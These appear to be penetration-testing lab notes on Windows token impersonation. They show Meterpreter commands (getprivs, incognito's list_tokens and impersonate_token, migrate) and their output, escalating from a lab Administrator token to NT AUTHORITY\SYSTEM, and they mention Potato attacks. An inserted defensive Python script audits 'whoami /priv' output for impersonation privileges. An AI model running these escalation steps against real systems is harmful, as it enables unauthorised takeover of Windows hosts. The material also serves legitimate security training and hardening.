Access Token

Get a Meterpreter session on the target and follow the technique below:-

getprivs
    SeAssignPrimaryTokenPrivilege
    SeAuditPrivilege
    SeChangeNotifyPrivilege
    SeCreateGlobalPrivilege
    SeImpersonatePrivilege
    SeIncreaseQuotaPrivilege
    SeIncreaseWorkingSetPrivilege
    SeSystemtimePrivilege
    SeTimeZonePrivilege
    

NOTE:- You need SeImpersonatePrivilege in the current process token to carry out this technique
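From the defender's side, the check that matters is which accounts hold SeImpersonatePrivilege (or SeAssignPrimaryTokenPrivilege) in the first place, since those are the privileges the technique above and the Potato family depend on. The following added example, which is not part of the original notes and not Metasploit or incognito code, parses the text that the built-in Windows `whoami /priv` command prints and flags those privileges so a hardening review can spot over-privileged service accounts. The sample output embedded in the script is constructed for this example; the `Privilege` record and the function names are this example's own.

```python
"""Audit a Windows account's token privileges from `whoami /priv` output.

Added example (not from the original notes). Parses the whitespace-aligned
table that `whoami /priv` prints and flags the privileges that allow token
impersonation. The sample output below is constructed for this example.
"""
from dataclasses import dataclass

# Privileges that let a process impersonate a client or assign another
# account's token to a new process. Holding either one is what the
# incognito technique and the Potato attacks rely on.
IMPERSONATION_PRIVILEGES = {
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
}

# Constructed sample: roughly what `whoami /priv` prints for a service account.
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State
=============================== ========================================= ========
SeAssignPrimaryTokenPrivilege   Replace a process level token             Disabled
SeAuditPrivilege                Generate security audits                  Disabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
SeCreateGlobalPrivilege         Create global objects                     Enabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
"""


@dataclass(frozen=True)
class Privilege:
    """One row of the `whoami /priv` table (hypothetical record type)."""
    name: str
    description: str
    enabled: bool


def parse_whoami_priv(text: str) -> list:
    """Parse `whoami /priv` output into Privilege records.

    Data rows are: privilege name, free-text description, then the State
    column ("Enabled" or "Disabled"). Header, separator and blank lines are
    skipped because they do not start with "Se" or end with a State value.
    """
    privileges = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        if not parts[0].startswith("Se") or parts[-1] not in ("Enabled", "Disabled"):
            continue
        privileges.append(
            Privilege(name=parts[0],
                      description=" ".join(parts[1:-1]),
                      enabled=(parts[-1] == "Enabled"))
        )
    return privileges


def impersonation_capable(privileges) -> list:
    """Return the names of held impersonation privileges, sorted.

    A privilege shown as "Disabled" still counts: it is held by the token and
    a process can enable it with AdjustTokenPrivileges, so the Disabled state
    is not a security control.
    """
    return sorted(p.name for p in privileges if p.name in IMPERSONATION_PRIVILEGES)


def audit(text: str) -> dict:
    """Summarise one account's privileges for a hardening review."""
    privileges = parse_whoami_priv(text)
    flagged = impersonation_capable(privileges)
    return {
        "total_privileges": len(privileges),
        "impersonation_privileges": flagged,
        "needs_review": bool(flagged),
    }


if __name__ == "__main__":
    # Usage: pipe real output in, e.g.  whoami /priv | python audit_priv.py
    import sys
    source = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_WHOAMI_PRIV
    report = audit(source)
    for name in report["impersonation_privileges"]:
        print(f"[!] token holds {name}")
    print(f"{report['total_privileges']} privileges parsed, "
          f"needs review: {report['needs_review']}")
```

Run it under the account being reviewed (a service account, an IIS application pool identity, and so on) and treat any account that is flagged but does not actually need to impersonate clients as a candidate for running under a less privileged identity.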

# Access Token Impersonation

load incognito
# if the session dies, run the exploit again
list_tokens -u

    Delegation Tokens Available # Interactive Logon
    ========================================
    ATTACKDEFENSE\Administrator
    NT AUTHORITY\LOCAL SERVICE

    Impersonation Tokens Available # Non-Interactive Logon
    ========================================
    No tokens available
  • The ATTACKDEFENSE\Administrator access token would provide elevated privileges

impersonate_token "ATTACKDEFENSE\Administrator"

getuid
	Server username: ATTACKDEFENSE\Administrator
getprivs
	[-] stdapi_sys_config_getprivs: Operation failed: Access is denied.
pgrep explorer
migrate 3640

getprivs
  • Listing tokens again from the migrated process can reveal additional available tokens

list_tokens -u

    Delegation Tokens Available
    ========================================
    ATTACKDEFENSE\Administrator
    NT AUTHORITY\LOCAL SERVICE
    NT AUTHORITY\SYSTEM
    Window Manager\DWM-1

    Impersonation Tokens Available
    ========================================
    Font Driver Host\UMFD-0
    Font Driver Host\UMFD-1
    NT AUTHORITY\NETWORK SERVICE
  • NT AUTHORITY\SYSTEM can be impersonated, gaining the privileges associated with its access token

impersonate_token "NT AUTHORITY\SYSTEM"
  • If no Delegation or Impersonation tokens are found, a Potato attack can be used to obtain or generate an NT AUTHORITY\SYSTEM access token, impersonate it and obtain the privileges associated with it.
